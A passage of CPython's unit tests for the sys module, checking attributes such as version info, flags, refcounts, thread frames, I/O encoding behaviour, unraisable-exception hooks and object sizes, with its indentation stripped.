test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
check(x, size('3Pi3c'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
